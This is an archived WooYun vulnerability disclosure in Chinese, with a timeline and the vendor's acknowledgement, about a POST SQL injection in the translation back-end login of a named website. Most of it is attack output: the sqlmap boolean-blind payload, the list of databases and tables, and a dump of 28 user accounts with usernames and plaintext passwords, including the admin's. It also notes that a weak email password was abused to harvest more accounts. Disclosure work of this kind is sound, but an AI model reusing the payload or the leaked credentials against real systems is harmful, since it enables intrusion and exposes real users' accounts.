乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-12-17: 细节已通知厂商并且等待厂商处理中 2013-12-17: 厂商已经确认,细节仅向厂商公开 2013-12-27: 细节向核心白帽子及相关领域专家公开 2014-01-06: 细节向普通白帽子公开 2014-01-16: 细节向实习白帽子公开 2014-01-31: 细节向公众公开
RT
存在问题的站点:http://www.chnpec.com
翻译系统后台登陆post注入;
---Place: POSTParameter: tran_username Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: tran_username=a' RLIKE IF(5767=5767,0x61,0x28) AND 'mUje'='mUje&tran_password=a---web application technology: PHP 5.4.9, Apache 2.2.22back-end DBMS: MySQL 5
数据库信息:
available databases [6]:[*] cpec[*] ctvit[*] information_schema[*] mysql[*] performance_schema[*] test
表信息:
Database: cpec[50 tables]+------------------------------------+| crproggetrightfr || crproginfo || crprogsalerightfr || crprogsalerigjt || hotwell_view || incre_table || perm_function_group || perm_operation || perm_role || perm_role_function || perm_role_operation || perm_user_role || program_view || tab_basiccolumn || tab_basicinformation || tab_basicinformation_en || tab_basicinformation_international || tab_city || tab_copyright || tab_crprogtip_relation || tab_info_img || tab_info_video || tab_international_syntime || tab_material || tab_program_apple || tab_program_hot || tab_sales_situation || tab_tran_task || tab_tran_user || tab_tv_notice || tab_tv_videoinfo || tab_user || tab_video || tab_video_apple || tab_video_cut || tab_videoimg || tab_web_user || tab_words || temp_yrj || tiabstract || tiprogeng || tiproginfo || tvvideoinfo || welive_comment || welive_guest || welive_msg || welive_session || welive_user || welive_usergroup || welive_vvc |+------------------------------------+
部分用户信息:
Database: cpecTable: tab_user[28 entries]+-------------+------------------------+----------+-------------+| user_id | email | password | serviceName |+-------------+------------------------+----------+-------------+| admin | <blank> | 123qwe | NULL || test111 | [email protected] | 111111 | NULL || maidi | [email protected] | 111111 | NULL || caidanxiang | [email protected] | 111111 | caidanxiang || fanqi | [email protected] | 111111 | fanqi || fengnan | [email protected] | 111111 | NULL || gj001 | [email protected] | 111111 | ????001 || gn001 | [email protected] | 111111 | ??01 || gn002 | [email protected] | 123456 | ?? || gn003 | [email protected] | 111111 | ??02 || jijie | [email protected] | 111111 | NULL || hongda | [email protected] | 111111 | test8 || lilifu | [email protected] | 111111 | NULL || limengxi | [email protected] | 111111 | limengxi || lixi | [email protected] | 111111 | NULL || luchong | [email protected] | 111111 | qq || luowei | [email protected] | 888888 | NULL || qiyang | [email protected] | 111111 | ??001 || quzheng | [email protected] | 111111 | NULL || wangjian | [email protected] | 111111 | wangjian || wangwei | [email protected] | 111111 | ?? || wangxin | [email protected] | 111111 | wangxin || yangtao | [email protected] | leonard | NULL || yanjie | [email protected] | 111111 | NULL || yeyanglei | [email protected] | 111111 | NULL || zhangyao | [email protected] | 111111 | zhangyao || zhanyingqi | [email protected] | 111111 | ??? || zhuyuhong | [email protected] | 111111 | NULL |+-------------+------------------------+----------+-------------+
利用某帐号邮箱弱口令获取所有用户邮箱帐号信息,继续爆破或许还有更多信息,这里测试点到即止;
见详细说明
过滤
危害等级:高
漏洞Rank:15
确认时间:2013-12-17 16:17
非常感谢,我们将尽快进行该业务的整改!~~感谢您对我们的支持和帮助!~~~
暂无
